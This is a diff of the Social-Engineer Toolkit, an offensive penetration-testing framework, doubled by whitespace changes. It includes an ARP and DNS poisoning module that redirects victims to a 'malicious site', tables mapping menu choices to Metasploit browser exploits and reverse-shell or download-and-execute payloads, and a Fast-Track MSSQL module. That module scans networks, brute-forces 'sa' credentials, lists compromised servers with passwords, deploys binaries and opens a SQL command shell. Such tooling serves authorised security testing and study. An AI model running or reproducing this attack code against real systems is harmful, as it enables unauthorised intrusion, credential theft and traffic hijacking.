if main_menu_choice == 'exit' or main_menu_choice == "99" or main_menu_choice == "quit":
exit_set()
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
except: pass
# funny2
if main_menu_choice == "derbycon":
print_warning(bcolors.BOLD + "YAYYYYYYYYYYYYYYYYYYYYYY DerbyCon.\n\nDerbyCon 3.0 -- September 25th through September 29th 2012" + bcolors.ENDC)
pause = raw_input(bcolors.BOLD + "\nDon't miss it! Sep 25 - Sep 29th! Press {return} to continue." + bcolors.ENDC)
# load set
if main_menu_choice == '1':
try:
reload(src.core.set)
except:
import src.core.set
# quit out
if main_menu_choice == 'exit' or main_menu_choice == "99" or main_menu_choice == "quit":
exit_set()
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
except: pass
# load fasttrack
if main_menu_choice == '2':
try: reload(src.core.fasttrack)
except: import src.core.fasttrack
# third party modules
if main_menu_choice == '3':
try: reload(src.core.module_handler)
except: import src.core.module_handler
# load set
if main_menu_choice == '1':
try:
reload(src.core.set)
except:
import src.core.set
# update metasploit
if main_menu_choice == '4':
update_metasploit()
# load fasttrack
if main_menu_choice == '2':
try: reload(src.core.fasttrack)
except: import src.core.fasttrack
# update set
if main_menu_choice == '5':
update_set()
# third party modules
if main_menu_choice == '3':
try: reload(src.core.module_handler)
except: import src.core.module_handler
# credits
if main_menu_choice == '6':
update_config()
# update config
if main_menu_choice == '7':
help_menu()
# update metasploit
if main_menu_choice == '4':
update_metasploit()
# update set
if main_menu_choice == '5':
update_set()
# credits
if main_menu_choice == '6':
update_config()
# update config
if main_menu_choice == '7':
help_menu()
# handle keyboard interrupts
except KeyboardInterrupt:
print "\n\nThank you for " + bcolors.RED+"shopping" + bcolors.ENDC+" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"
print "\n\nThank you for " + bcolors.RED+"shopping" + bcolors.ENDC+" with the Social-Engineer Toolkit.\n\nHack the Gibson...and remember...hugs are worth more than handshakes.\n"
# handle exceptions
except Exception, error:
log(error)
print "\n\n[!] Something went wrong, printing the error: "+ str(error)
log(error)
print "\n\n[!] Something went wrong, printing the error: "+ str(error)
# cleanup routine
cleanup_routine()

130
set-automate
View file

@ -13,89 +13,89 @@ import re
try: import pexpect
# if pexpect fails
except ImportError:
print "\n[*] PEXPECT is required, please download and install before running this..."
print "[*] Exiting SET-AUTOMATE mode..."
sys.exit()
print "\n[*] PEXPECT is required, please download and install before running this..."
print "[*] Exiting SET-AUTOMATE mode..."
sys.exit()
# try to define filename through argument specified during command line mode
try:
filename=sys.argv[1]
filename=sys.argv[1]
# if we through an exception spit out the command line syntax
except IndexError:
print "\nThe Social-Engineer Toolkit Automate - Automatation for SET"
print "\nSimply create a file that has each option you want from menu mode."
print "For example your file should look something like this:"
print "\n2\n2\n2\nhttps://gmail.com\n2\n2\n443\netc.\n"
print "Usage: ./set-automate <filename>"
sys.exit()
print "\nThe Social-Engineer Toolkit Automate - Automatation for SET"
print "\nSimply create a file that has each option you want from menu mode."
print "For example your file should look something like this:"
print "\n2\n2\n2\nhttps://gmail.com\n2\n2\n443\netc.\n"
print "Usage: ./set-automate <filename>"
sys.exit()
# if the filename doesnt exist throw an error
if not os.path.isfile(filename):
print "\n[*] Sorry hoss, unable to locate that filename, try again.\n"
sys.exit()
if not os.path.isfile(filename):
print "\n[*] Sorry hoss, unable to locate that filename, try again.\n"
sys.exit()
password="false"
# if the path is around
if os.path.isfile(filename):
try:
print "[*] Spawning SET in a threaded process..."
child=pexpect.spawn("python set")
#child.delaybeforesend = 0
fileopen=file(filename,"r")
for line in fileopen:
line=line.rstrip()
# if we just use enter send default
if line == "": line="default"
try:
print "[*] Spawning SET in a threaded process..."
child=pexpect.spawn("python set")
#child.delaybeforesend = 0
fileopen=file(filename,"r")
for line in fileopen:
line=line.rstrip()
# if we just use enter send default
if line == "": line="default"
match1=re.search("OMGPASSWORDHERE", line)
if match1:
line=line.replace(" OMGPASSWORDHERE", "")
password="true"
match1=re.search("OMGPASSWORDHERE", line)
if match1:
line=line.replace(" OMGPASSWORDHERE", "")
password="true"
if password == "false":
print "[*] Sending command %s to the interface..." % (line)
if password == "true":
print "[*] Sending command [**********] (password masked) to the interface..."
password="false"
if password == "false":
print "[*] Sending command %s to the interface..." % (line)
if password == "true":
print "[*] Sending command [**********] (password masked) to the interface..."
password="false"
if line == "default":
line=""
if line == "default":
line=""
if line == "CONTROL-C-HERE":
try:
print "[*] This may take a few seconds while SET catches up..."
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
if line == "CONTROL-C-HERE":
try:
print "[*] This may take a few seconds while SET catches up..."
child.expect("Next line of the body:")
time.sleep(2)
child.sendline("\n")
child.sendcontrol('c')
# if the user is using pexpect < 2.3
except AttributeError:
print "[-] Error: You are running pexpect < 2.3 which is needed for this function"
choice=raw_input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen("wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;tar -zxvf pexpect-2.3.tar.gz;cd pexpect-2.3;python setup.py install;cd ..;rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print "[*] Relaunch the Social-Engineer Toolkit for changes to apply."
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
# if the user is using pexpect < 2.3
except AttributeError:
print "[-] Error: You are running pexpect < 2.3 which is needed for this function"
choice=raw_input("Would you like to install it now yes or no: ")
if choice == "yes" or choice == "y":
subprocess.Popen("wget http://sourceforge.net/projects/pexpect/files/pexpect/Release%202.3/pexpect-2.3.tar.gz;tar -zxvf pexpect-2.3.tar.gz;cd pexpect-2.3;python setup.py install;cd ..;rm -rf pexpect-2*", shell=True).wait()
try:
reload(pexpect)
child.sendcontrol('c')
except:
print "[*] Relaunch the Social-Engineer Toolkit for changes to apply."
sys.exit()
if line != "CONTROL-C-HERE":
child.sendline(line)
print "[*] Finished sending commands, interacting with the interface.."
child.interact()
print "[*] Finished sending commands, interacting with the interface.."
child.interact()
# sometimes pexpect can throw errors upon exit this handles them
except OSError:
sys.exit()
# sometimes pexpect can throw errors upon exit this handles them
except OSError:
sys.exit()
# handle keyboardinterrupts (controlc)
except KeyboardInterrupt:
print "[*] Control-C detected, exiting the Social-Engineer Toolkit.."
sys.exit()
# handle keyboardinterrupts (controlc)
except KeyboardInterrupt:
print "[*] Control-C detected, exiting the Social-Engineer Toolkit.."
sys.exit()
# handle everything else
except Exception,e: print "[*] Something went wrong, printing error: %s" % str(e)
# handle everything else
except Exception,e: print "[*] Something went wrong, printing error: %s" % str(e)

74
set-proxy
View file

@ -16,52 +16,52 @@ operating_system = check_os()
# if windows then do some stuff
if operating_system == "posix":
definepath = os.getcwd()
definepath = os.getcwd()
print "\n[*] Welcome to the SET-Proxy Configuration Utility"
print "\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n"
print "\n[*] Welcome to the SET-Proxy Configuration Utility"
print "\nEnter the proxy setting informatiom below.\n\nExample: http://10.3.1.1:8080\n"
try:
try:
proxy = raw_input("Enter the proxy server: ")
username = raw_input("Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass("Enter the password for the proxy (hit enter for none): ")
proxy = raw_input("Enter the proxy server: ")
username = raw_input("Enter the username for the proxy (hit enter for none): ")
password = getpass.getpass("Enter the password for the proxy (hit enter for none): ")
except KeyboardInterrupt:
print "\n[!] Exiting the Social-Engineer Toolkit."
sys.exit()
except KeyboardInterrupt:
print "\n[!] Exiting the Social-Engineer Toolkit."
sys.exit()
if username != "":
proxy_string = "export http_proxy='http://%s:%s@%s'" % (username,password,proxy)
if username != "":
proxy_string = "export http_proxy='http://%s:%s@%s'" % (username,password,proxy)
if username == "":
proxy_string = "export http_proxy='http://%s'" % (proxy)
if username == "":
proxy_string = "export http_proxy='http://%s'" % (proxy)
filewrite = file("src/program_junk/proxy.config", "w")
filewrite.write(proxy_string)
filewrite.close()
filewrite = file("src/program_junk/proxy.config", "w")
filewrite.write(proxy_string)
filewrite.close()
from src.core.set import *
from src.core.set import *
def kill_proc(port,flag):
proc=subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE)
stdout_value=proc.communicate()[0]
a=re.search("\d+/%s" % (flag), stdout_value)
if a:
b=a.group()
b=b.replace("/%s" % (flag),"")
subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" % (b), shell=True).wait()
def kill_proc(port,flag):
proc=subprocess.Popen("netstat -antp | grep '%s'" % (port), shell=True, stdout=subprocess.PIPE)
stdout_value=proc.communicate()[0]
a=re.search("\d+/%s" % (flag), stdout_value)
if a:
b=a.group()
b=b.replace("/%s" % (flag),"")
subprocess.Popen("kill -9 %s 1> /dev/null 2> /dev/null" % (b), shell=True).wait()
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
# cleans up stale processes from SET
try:
# kill anything python running on 80
kill_proc("80","python")
# kill anything on 443 ruby which is generally a rogue listener
kill_proc("443", "ruby")
# handle errors
except Exception, error:
log(error)
pass
# handle errors
except Exception, error:
log(error)
pass
else:
print "[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system."
print "[!] Sorry, this only works on posix (nix) based systems and is not compatible with this operating system."

1
set-update
View file

@ -16,4 +16,3 @@ except KeyboardInterrupt:
# handle all other errors
except Exception, e: print "\n[!] Something went wrong.. Printing the error: " + e

16
set-web
View file

@ -1,19 +1,19 @@
#!/usr/bin/env python
import sys,socket
try:
# import the web interface
from src.commandcenter.command_center import *
# import the web interface
from src.commandcenter.command_center import *
# except socket errors
except socket.error:
print "[*] Something is already running on the SET web port, please exit it and then restart.\n\n"
print "[*] Something is already running on the SET web port, please exit it and then restart.\n\n"
# except os errors
except OSError:
pass
pass
# except the rest
except:
print "[*] Exiting the Social-Engineer Toolkit Command-Center"
print "[*] Thank you for shopping at the Social-Engineer Toolkit\n"
pass
except:
print "[*] Exiting the Social-Engineer Toolkit Command-Center"
print "[*] Thank you for shopping at the Social-Engineer Toolkit\n"
pass

14
setup.py
View file

@ -20,15 +20,15 @@ if platform.system() == "Linux":
# if index is out of range then flag options
except IndexError:
print "** SET Dependancy Installer v0.2 **"
print "\nTo install: setup.py install"
print "\nTo install: setup.py install"
# if user specified install then lets to the installation
if installer == True:
# if we trigger on sources.list then we know its ubuntu
if os.path.isfile("/etc/apt/sources.list"):
# force install of debian packages
# force install of debian packages
subprocess.Popen("apt-get --force-yes -y install build-essential python-pexpect python-beautifulsoup python-pefile python-crypto python-openssl python-pymssql", shell=True).wait()
# if sources.list is not available then we're running something offset
@ -38,9 +38,9 @@ if platform.system() == "Linux":
sys.exit()
if platform.system() =='Darwin':
subprocess.Popen("easy_install pexpect beautifulsoup pycrypto pyopenssl pefile pymssql beautifulsoup", shell=True).wait()
print "[!] Note that you will need to install XCODE for OSX and run 'sudo easy_install cython pymssql' to finish."
subprocess.Popen("easy_install pexpect beautifulsoup pycrypto pyopenssl pefile pymssql beautifulsoup", shell=True).wait()
print "[!] Note that you will need to install XCODE for OSX and run 'sudo easy_install cython pymssql' to finish."
if platform.system != "Linux":
if platform.system != "Darwin":
print "[!] Sorry this installer is not designed for any other system other than Linux and Mac. Please install the python depends manually."
if platform.system != "Darwin":
print "[!] Sorry this installer is not designed for any other system other than Linux and Mac. Please install the python depends manually."

6
src/autorun/autorun.py
View file

@ -34,9 +34,9 @@ filewrite = file("autorun/autorun.inf", "w")
# if we are using shellcodeexec
alpha_data = ""
if os.path.isfile("src/program_junk/meterpreter.alpha"):
fileopen = file("src/program_junk/meterpreter.alpha", "r")
alpha_data = fileopen.read().rstrip()
fileopen = file("src/program_junk/meterpreter.alpha", "r")
alpha_data = fileopen.read().rstrip()
# if using standard payloads
if trigger == 1:

2772
src/commandcenter/command_center.py
View file

File diff suppressed because it is too large Load diff

2
src/commandcenter/config_editor.py
View file

@ -24,7 +24,7 @@ for line in fileopen:
# strip any garbage trailing characters
line=line.rstrip()
# grab anything without comments on it
if line[0:1] != "#":
if line[0:1] != "#":
line=line.split("=")
html_form(line[0],line[1])
counter=counter+1

22
src/core/arp_cache/arp.py
View file

@ -16,14 +16,14 @@ definepath=os.getcwd()
config=file("config/set_config", "r").readlines()
# grab our default directory
cwd=os.getcwd()
# set a variable as default to n or no
# set a variable as default to n or no
ettercapchoice= 'n'
# add dsniffchoice
dsniffchoice = 'n'
for line in config:
# check for ettercap choice here
match1=re.search("ETTERCAP=ON",line)
if match1:
if match1:
setcore.print_info("ARP Cache Poisoning is set to " + setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC)
ettercapchoice='y'
@ -52,8 +52,8 @@ for line in fileopen:
line=line.rstrip()
path=line.replace("ETTERCAP_PATH=", "")
if not os.path.isfile(path):
path = ("/usr/local/share/ettercap")
if not os.path.isfile(path):
path = ("/usr/local/share/ettercap")
# if we are using ettercap then get everything ready
if ettercapchoice== 'y':
@ -73,7 +73,7 @@ if ettercapchoice== 'y':
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard
site. You can alternatively poison everyone and everysite by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
@ -83,7 +83,7 @@ if ettercapchoice== 'y':
os.chdir(path)
# small fix for default
if dns_spoof == "":
# set default to * (everything)
# set default to * (everything)
dns_spoof="*"
# remove old stale files
subprocess.Popen("rm etter.dns 1> /dev/null 2> /dev/null", shell=True).wait()
@ -112,10 +112,10 @@ if ettercapchoice== 'y':
filewrite.close()
os.chdir(cwd)
except Exception, error:
os.chdir(cwd)
os.chdir(cwd)
#log(error)
setcore.print_error("ERROR:An error has occured:")
print "ERROR:" +str(error)
print "ERROR:" +str(error)
# if we are using dsniff
if dsniffchoice == 'y':
@ -135,7 +135,7 @@ if dsniffchoice == 'y':
will want to trigger the DNS redirect on. A simple example of this is if you
wanted to trigger everyone on your subnet to connect to you when they go to
browse to www.google.com, the victim would then be redirected to your malicious
site. You can alternatively poison everyone and everysite by using the wildcard
site. You can alternatively poison everyone and everysite by using the wildcard
'*' flag.
IF YOU WANT TO POISON ALL DNS ENTRIES (DEFAULT) JUST HIT ENTER OR *
@ -167,10 +167,8 @@ if dsniffchoice == 'y':
# this is needed to keep it similar to format above for web gui mode
pause=raw_input("Press <return> to begin dsniff.")
except Exception, error:
os.chdir(cwd)
os.chdir(cwd)
#log(error)
# print error message
setcore.print_error("ERROR:An error has occurred:")
print setcore.bcolors.RED + "ERROR" + str(error) + setcore.bcolors.ENDC

65
src/core/dictionaries.py
View file

@ -1,14 +1,14 @@
#!/usr/bin/env python
""" Python lists used for quick conversion of user input
to strings used by the toolkit
to strings used by the toolkit
"""
def encoder_type(encode):
"""
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
the actual value to be used.
"""
return {
@ -34,15 +34,15 @@ def encoder_type(encode):
def ms_module(exploit):
""" Receives the input given by the user from gen_payload.py """
return {
'1':"exploit/multi/browser/java_jre17_jmxbean_2",
'2':"exploit/multi/browser/java_jre17_jmxbean",
'3':"exploit/windows/browser/ie_cbutton_uaf",
'4':"exploit/multi/browser/java_jre17_exec",
'5':"exploit/windows/browser/ie_execcommand_uaf",
'1':"exploit/multi/browser/java_jre17_jmxbean_2",
'2':"exploit/multi/browser/java_jre17_jmxbean",
'3':"exploit/windows/browser/ie_cbutton_uaf",
'4':"exploit/multi/browser/java_jre17_exec",
'5':"exploit/windows/browser/ie_execcommand_uaf",
'6':"exploit/multi/browser/java_atomicreferencearray",
'7':"exploit/multi/browser/java_verifier_field_access",
'7':"exploit/multi/browser/java_verifier_field_access",
'8':"exploit/windows/browser/ms12_037_same_id",
'9':"exploit/windows/browser/msxml_get_definition_code_exec",
'10':"exploit/windows/browser/adobe_flash_rtmp",
@ -75,17 +75,17 @@ def ms_module(exploit):
'37':"windows/browser/mozilla_mchannel",
'38':"auxiliary/server/browser_autopwn",
}.get(exploit,"ERROR")
# called from gen_payload.py
# uses payload_menu_2
def ms_payload(payload):
"""
Receives the input given by the user from create_payload.py
and create_payloads.py
Receives the input given by the user from create_payload.py
and create_payloads.py
"""
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
@ -99,12 +99,12 @@ def ms_payload(payload):
'10':"windows/meterpreter/reverse_tcp_dns",
'11':"windows/download_exec",
}.get(payload,"ERROR")
# called from create_payloads.py
def ms_payload_2(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
@ -120,13 +120,13 @@ def ms_payload_2(payload):
'12':"set/reverse_shell",
'13':"set/reverse_shell",
'14':"shellcode/alphanum",
'15':"shellcode/pyinject",
'16':"shellcode/multipyinject",
'15':"shellcode/pyinject",
'16':"shellcode/multipyinject",
}.get(payload,"ERROR")
def ms_payload_3(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
@ -141,7 +141,7 @@ def ms_payload_3(payload):
# uses create_payloads_menu
def ms_attacks(exploit):
""" Receives the input given by the user from create_payload.py """
return {
'1':"dll_hijacking",
'2':"unc_embed",
@ -164,7 +164,7 @@ def ms_attacks(exploit):
'19':"exploit/windows/fileformat/adobe_reader_u3d",
'20':"exploit/windows/fileformat/ms12_027_mscomctl_bof",
}.get(exploit,"INVALID")
def teensy_config(choice):
""" Receives the input given by the user from set.py """
@ -176,10 +176,10 @@ def teensy_config(choice):
'5':"java_applet.pde",
'6':"gnome_wget.pde"
}.get(choice,"ERROR")
def webattack_vector(attack_vector):
""" Receives the input given by the user from set.py """
return {
'1':"java",
'2':"browser",
@ -189,12 +189,12 @@ def webattack_vector(attack_vector):
'6':"webjacking",
'7':"multiattack"
}.get(attack_vector,"ERROR")
def category(category):
"""
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
the actual value to be used.
"""
@ -229,7 +229,6 @@ def category(category):
'27':"set",
'28':"teensy2powershell",
'29':"powershell",
'30':"delldrac",
'31':"ridenum"
'30':"delldrac",
'31':"ridenum"
}.get(category,"ERROR")

594
src/core/fasttrack.py
View file

@ -6,14 +6,14 @@ import subprocess
definepath = os.getcwd()
try:
import _mssql
import _mssql
except ImportError:
print_error("PYMSSQL is not installed. MSSQL attacks will not work!")
operating_system = check_os()
if operating_system == "windows":
print_status("You can download PYMSSQL executables from here: http://www.lfd.uci.edu/~gohlke/pythonlibs/")
raw_input("Press {return} to continue.")
pass
print_error("PYMSSQL is not installed. MSSQL attacks will not work!")
operating_system = check_os()
if operating_system == "windows":
print_status("You can download PYMSSQL executables from here: http://www.lfd.uci.edu/~gohlke/pythonlibs/")
raw_input("Press {return} to continue.")
pass
#
#
# Fast-Track Main options and interface menus
@ -21,329 +21,329 @@ except ImportError:
#
check_mssql()
try:
while 1:
###################################################
# USER INPUT: SHOW WEB ATTACK MENU #
###################################################
while 1:
###################################################
# USER INPUT: SHOW WEB ATTACK MENU #
###################################################
create_menu(text.fasttrack_text, text.fasttrack_menu)
attack_vector = raw_input(setprompt(["19"], ""))
create_menu(text.fasttrack_text, text.fasttrack_menu)
attack_vector = raw_input(setprompt(["19"], ""))
if attack_vector == "99" or attack_vector == "quit" or attack_vector == "exit":
break
if attack_vector == "99" or attack_vector == "quit" or attack_vector == "exit":
break
##################################
##################################
# mssql_scanner
##################################
##################################
if attack_vector == "1":
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
# take input here
attack_vector_sql = raw_input(setprompt(["19","21"], ""))
##################################
##################################
# mssql_scanner
##################################
##################################
if attack_vector == "1":
# start the menu
create_menu(text.fasttrack_mssql_text1, text.fasttrack_mssql_menu1)
# take input here
attack_vector_sql = raw_input(setprompt(["19","21"], ""))
#
# option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR, single IP, or filename with IP addresses (ex. 192.168.1.1/24 or filename.txt)"))
# grab the port
port = raw_input(setprompt(["19","21","22"], "Enter the port number to scan [1433]"))
# if default use 1433
if port == "": port = 1433
# ask for a wordlist
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "": wordlist = "default"
# specify the user to brute force
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
# default to sa
if username == "": username = "sa"
if username != "sa":
if not os.path.isfile(username):
print_status("If you were using a file, its not found, using text as username.")
# import the mssql module from fasttrack
from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot
if choice != "2":
# sql_servers
sql_servers = mssql.scan(range, port, port)
# specify choice 2
if choice == "2":
if not os.path.isfile(range):
while 1:
print_warning("Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range):
print_status("Atta boy. Found the file this time. Moving on.")
break
fileopen = file(range, "r").readlines()
sql_servers = ""
for line in fileopen:
line=line.rstrip()
sql_servers = sql_servers + line + ","
# this will hold all of the SQL servers eventually
master_list = ""
# set a base counter
counter = 0
# if we specified a username list
if os.path.isfile(username):
usernames = file(username, "r")
if sql_servers != False:
# get rid of extra data from port scanner
sql_servers = sql_servers.replace(":%s OPEN" % (port), "")
# split into tuple for different IP address
sql_servers = sql_servers.split(",")
# start loop and brute force
for servers in sql_servers:
#
# option 1 scan and attack, option 2 connect directly to mssql
# if 1, start scan and attack
#
if attack_vector_sql == '1':
print "\nHere you can select either a CIDR notation/IP Address or a filename\nthat contains a list of IP Addresses.\n\nFormat for a file would be similar to this:\n\n192.168.13.25\n192.168.13.26\n192.168.13.26\n\n1. Scan IP address or CIDR\n2. Import file that contains SQL Server IP addresses\n"
choice = raw_input(setprompt(["19", "21", "22"], "Enter your choice (ex. 1 or 2) [1]"))
# grab ip address
range = raw_input(setprompt(["19","21","22"], "Enter the CIDR, single IP, or filename with IP addresses (ex. 192.168.1.1/24 or filename.txt)"))
# grab the port
port = raw_input(setprompt(["19","21","22"], "Enter the port number to scan [1433]"))
# if default use 1433
if port == "": port = 1433
# ask for a wordlist
wordlist = raw_input(setprompt(["19","21","22"], "Enter path to a wordlist file [use default wordlist]"))
if wordlist == "": wordlist = "default"
# specify the user to brute force
username = raw_input(setprompt(["19","21","22"], "Enter the username to brute force or specify username file (/root/users.txt) [sa]"))
# default to sa
if username == "": username = "sa"
if username != "sa":
if not os.path.isfile(username):
print_status("If you were using a file, its not found, using text as username.")
# import the mssql module from fasttrack
from src.fasttrack import mssql
# choice from earlier if we want to use a filelist or whatnot
if choice != "2":
# sql_servers
sql_servers = mssql.scan(range, port, port)
# specify choice 2
if choice == "2":
if not os.path.isfile(range):
while 1:
print_warning("Sorry boss. The file was not found. Try again")
range = raw_input(setprompt(["19","21", "22"], "Enter the CIDR, single, IP, or file with IP addresses (ex. 192.168.1.1/24)"))
if os.path.isfile(range):
print_status("Atta boy. Found the file this time. Moving on.")
break
fileopen = file(range, "r").readlines()
sql_servers = ""
for line in fileopen:
line=line.rstrip()
sql_servers = sql_servers + line + ","
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break into this to the above with a newline to be parsed later
master_list = master_list + sql_success + ":"
counter = 1
# this will hold all of the SQL servers eventually
master_list = ""
# set a base counter
counter = 0
# if we specified a username list
if os.path.isfile(username):
usernames = file(username, "r")
# if we specified a username list
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(servers, users, port, wordlist)
# we wont break out of the loop here incase theres multiple usernames we want to find
if sql_success != False:
master_list = master_list + sql_success + ":"
counter = 1
if sql_servers != False:
# get rid of extra data from port scanner
sql_servers = sql_servers.replace(":%s OPEN" % (port), "")
# split into tuple for different IP address
sql_servers = sql_servers.split(",")
# start loop and brute force
for servers in sql_servers:
# if we didn't successful attack one
if counter == 0:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input("Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
while 1:
# set a counter to show compromised servers
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status("Select the compromise SQL server you want to interact with:\n")
for success in master_names:
if success != "":
success = success.rstrip()
success=success.split(",")
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC
print " " + str(counter) + ". " + success
# increment counter
counter = counter + 1
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
if servers != "":
# if we aren't using a username file
if not os.path.isfile(username):
sql_success = mssql.brute(servers, username, port, wordlist)
if sql_success != False:
# after each success or fail it will break into this to the above with a newline to be parsed later
master_list = master_list + sql_success + ":"
counter = 1
print "\n 99. Return back to the main menu.\n"
# select the server to interact with
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
# default 1
if select_server == "quit" or select_server == "exit": break
if select_server == "": select_server = "1"
if select_server == "99": break
counter = 1
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords
print "\nHow do you want to deploy the binary via debug (win2k, winxp, win2003) or powershell (vista,win7)\n\n 1. Windows Powershell\n 2. Windows Debug Conversion\n 3. Standard Windows Shell\n\n 99. Return back to the main menu.\n"
option = raw_input(setprompt(["19","21","22"], "Which deployment option do you want [1]"))
if option == "": option = "2"
# if 99 then break
if option == "99": break
# specify we are using the fasttrack option, this disables some features
filewrite = file("src/program_junk/fasttrack.options", "w")
filewrite.write("none")
filewrite.close()
# import fasttrack
if option == "1" or option == "2":
# import payloads for selection and prep
try: reload(src.core.payloadgen.create_payloads)
except: import src.core.payloadgen.create_payloads
mssql.deploy_hex2binary(success[0], success[2], success[1], success[3], option)
# straight up connect
if option == "3":
mssql.cmdshell(success[0], success[2], success[1], success[3], option)
# increment counter
counter = counter + 1
#
# if we want to connect directly to a SQL server
#
if attack_vector_sql == "2":
sql_server = raw_input(setprompt(["19","21","23"], "Enter the hostname or IP address of the SQL server"))
sql_port = raw_input(setprompt(["19","21","23"], "Enter the SQL port to connect [1433]"))
if sql_port == "": sql_port = "1433"
sql_username = raw_input(setprompt(["19","21","23"], "Enter the username of the SQL Server [sa]"))
# default to sa
if sql_username == "": sql_username = "sa"
sql_password = raw_input(setprompt(["19","21","23"], "Enter the password for the SQL server"))
print_status("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
conn = _mssql.connect(sql_server + ":" + str(sql_port), sql_username, sql_password)
# if we specified a username list
if os.path.isfile(username):
for users in usernames:
users = users.rstrip()
sql_success = mssql.brute(servers, users, port, wordlist)
# we wont break out of the loop here incase theres multiple usernames we want to find
if sql_success != False:
master_list = master_list + sql_success + ":"
counter = 1
except Exception, e:
print e
print_error("Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
print_status("Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
print_status("Exiting the SQL shell and returning to menu.")
break
try:
# execute the query
sql_query = conn.execute_query(sql_shell)
# return results
print "\n"
for data in conn:
data = str(data)
data = data.replace("\\n\\t", "\n")
data = data.replace("\\n", "\n")
data = data.replace("{0: '", "")
data = data.replace("'}", "")
print data
except Exception, e:
print_warning("\nIncorrect syntax somewhere. Printing error message: " + str(e))
# if we didn't successful attack one
if counter == 0:
print_warning("Sorry. Unable to locate or fully compromise a MSSQL Server.")
pause = raw_input("Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
while 1:
# set a counter to show compromised servers
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
print_status("Select the compromise SQL server you want to interact with:\n")
for success in master_names:
if success != "":
success = success.rstrip()
success=success.split(",")
success= bcolors.BOLD + success[0] + bcolors.ENDC + " username: " + bcolors.BOLD + "%s" % (success[1]) + bcolors.ENDC + " | password: " + bcolors.BOLD + "%s" % (success[3]) + bcolors.ENDC
print " " + str(counter) + ". " + success
# increment counter
counter = counter + 1
print "\n 99. Return back to the main menu.\n"
# select the server to interact with
select_server = raw_input(setprompt(["19","21","22"], "Select the SQL server to interact with [1]"))
# default 1
if select_server == "quit" or select_server == "exit": break
if select_server == "": select_server = "1"
if select_server == "99": break
counter = 1
for success in master_names:
if success != "":
success = success.rstrip()
success = success.split(",")
# if we equal the number used above
if counter == int(select_server):
# ipaddr + "," + username + "," + str(port) + "," + passwords
